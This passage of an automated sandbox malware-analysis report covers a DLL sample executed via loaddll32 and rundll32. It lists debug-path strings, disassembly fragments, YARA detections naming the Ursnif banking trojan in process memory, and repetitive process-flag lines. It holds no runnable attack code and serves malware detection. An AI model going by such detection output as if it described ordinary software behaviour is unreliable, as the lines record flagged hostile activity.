                      Source: Binary string: shell32.pdb source: WerFault.exe, 0000000D.00000003.560886556.0000000005121000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.580492113.0000000005731000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.593393717.0000000004DC1000.00000004.00000001.sdmp
                      Source: Binary string: ntmarta.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000000D.00000003.560886556.0000000005121000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.580492113.0000000005731000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.593393717.0000000004DC1000.00000004.00000001.sdmp
                      Source: Binary string: powrprof.pdbf$ source: WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: cryptbase.pdbM:{E source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp
                      Source: Binary string: advapi32.pdb@$ source: WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000000D.00000003.560886556.0000000005121000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.580492113.0000000005731000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.593393717.0000000004DC1000.00000004.00000001.sdmp
                      Source: Binary string: wimm32.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: CoreUIComponents.pdb source: WerFault.exe, 0000000D.00000003.561222548.0000000005102000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: mpr.pdb source: WerFault.exe, 0000000D.00000003.561052377.00000000050F0000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580812723.0000000005700000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593688376.0000000004EE0000.00000004.00000040.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000000D.00000003.560886556.0000000005121000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.580492113.0000000005731000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.593393717.0000000004DC1000.00000004.00000001.sdmp
                      Source: Binary string: mpr.pdb@ source: WerFault.exe, 00000014.00000003.593688376.0000000004EE0000.00000004.00000040.sdmp
                      Source: Binary string: fltLib.pdb+:EE source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp
                      Source: Binary string: setupapi.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: imagehlp.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: wUxTheme.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: upwntdll.pdb source: WerFault.exe, 00000014.00000003.578932063.0000000004B9E000.00000004.00000001.sdmp
                      Source: Binary string: wsspicli.pdbX$ source: WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: winspool.pdbe: source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp
                      Source: Binary string: wsspicli.pdbU:CEt source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp
                      Source: Binary string: dwmapi.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: shcore.pdbk source: WerFault.exe, 0000000D.00000003.560947472.00000000050F2000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580864219.0000000005704000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593490738.0000000004EE2000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000010.00000003.557389440.00000000034DB000.00000004.00000001.sdmp
                      Source: Binary string: profapi.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: msctf.pdbC:}E source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp
                      Source: Binary string: winspool.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000000D.00000003.560886556.0000000005121000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.580492113.0000000005731000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.593393717.0000000004DC1000.00000004.00000001.sdmp
                      Source: Binary string: winspool.pdbCP{e. source: WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp
                      Source: Binary string: sechost.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: iphlpapi.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: advapi32.pdbq:oE source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp
                      Source: Binary string: propsys.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 0000000D.00000003.560947472.00000000050F2000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580864219.0000000005704000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593490738.0000000004EE2000.00000004.00000040.sdmp
                      Source: Binary string: powrprof.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: WinTypes.pdbj7 source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp
                      Source: Binary string: msctf.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: ole32.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: TextInputFramework.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: AcLayers.pdb source: WerFault.exe, 0000000D.00000003.560886556.0000000005121000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.580492113.0000000005731000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.593393717.0000000004DC1000.00000004.00000001.sdmp
                      Source: Binary string: CoreUIComponents.pdbC source: WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: sfc.pdbC source: WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: c:\wheel\receive\Many-rise\score.pdb source: loaddll32.exe, 00000000.00000002.828952358.000000006E83B000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.829929626.000000006E83B000.00000002.00020000.sdmp, m87xfb63XU.dll
                      Source: Binary string: sechost.pdbw:aE source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp
                      Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000D.00000003.561052377.00000000050F0000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580812723.0000000005700000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593688376.0000000004EE0000.00000004.00000040.sdmp
                      Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 0000000D.00000003.552382095.0000000002F9A000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.558219704.00000000034E6000.00000004.00000001.sdmp
                      Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000D.00000003.560947472.00000000050F2000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580864219.0000000005704000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593490738.0000000004EE2000.00000004.00000040.sdmp
                      Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000D.00000003.561052377.00000000050F0000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580812723.0000000005700000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593688376.0000000004EE0000.00000004.00000040.sdmp
                      Source: Binary string: setupapi.pdb!:_Er source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp
                      Source: Binary string: combase.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000D.00000003.561052377.00000000050F0000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580812723.0000000005700000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593688376.0000000004EE0000.00000004.00000040.sdmp
                      Source: Binary string: imagehlp.pdbY:wE source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp
                      Source: Binary string: rundll32.pdb source: WerFault.exe, 0000000D.00000003.560886556.0000000005121000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.580492113.0000000005731000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.593393717.0000000004DC1000.00000004.00000001.sdmp
                      Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000010.00000003.557399888.00000000034E1000.00000004.00000001.sdmp
                      Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: sfc.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: imagehlp.pdbIPae source: WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp
                      Source: Binary string: ntmarta.pdbH7|E source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp
                      Source: Binary string: msctf.pdbN$ source: WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: CoreUIComponents.pdb_ source: WerFault.exe, 0000000D.00000003.561222548.0000000005102000.00000004.00000040.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 0000000D.00000003.560886556.0000000005121000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.580492113.0000000005731000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.593393717.0000000004DC1000.00000004.00000001.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 0000000D.00000003.560886556.0000000005121000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.580492113.0000000005731000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.593393717.0000000004DC1000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdbk source: WerFault.exe, 0000000D.00000003.560886556.0000000005121000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.580492113.0000000005731000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.593393717.0000000004DC1000.00000004.00000001.sdmp
                      Source: Binary string: shlwapi.pdbo: source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp
                      Source: Binary string: sechost.pdbR$ source: WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: wUxTheme.pdbwPge source: WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E7C2150 push ecx; ret
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E7C21A3 push ecx; ret
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00C4ABE0 push ecx; ret
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00C4AF13 push ecx; ret
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E7FAB9A push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_008FABE0 push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_008FAF13 push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E7FAB9A push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0043CA68 push esp; retf 0043h
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E7C1DE5 LoadLibraryA,GetProcAddress,

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000003.00000002.829711196.0000000004CD0000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.573182276.00000000034C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.575886663.00000000034C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.577592974.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.577142287.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.621678183.0000000004F4B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.574590732.00000000034C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.573615076.00000000034C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.828440646.00000000030D0000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.574198555.00000000034C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.573998703.00000000034C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.576726243.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.619056224.000000000334B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.577395162.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.578289206.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.576921901.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.573750690.00000000034C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.573091337.00000000034C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.707612619.000000000314F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.574533141.00000000034C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.711256543.0000000004D4F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.576829931.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.664577952.000000000324D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.667981816.0000000004E4D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.577047375.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.576567742.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6444, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4352, type: MEMORYSTR
                      Source: Yara matchFile source: 2.3.rundll32.exe.2f3a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.2f194a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.2f3a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.d5a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.68a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.4da31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.49494a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.68a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.c40000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.6e7c0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.49494a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.d5a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.8da31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.8da31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.4da31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.2f194a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.8f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.6e7c0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.828285916.0000000002F19000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.512556680.0000000000D50000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.492597168.00000000008D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.829472336.0000000004949000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.512003320.00000000004D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.506220086.0000000000680000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.492790466.0000000002F30000.00000040.00000001.sdmp, type: MEMORY
                      Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
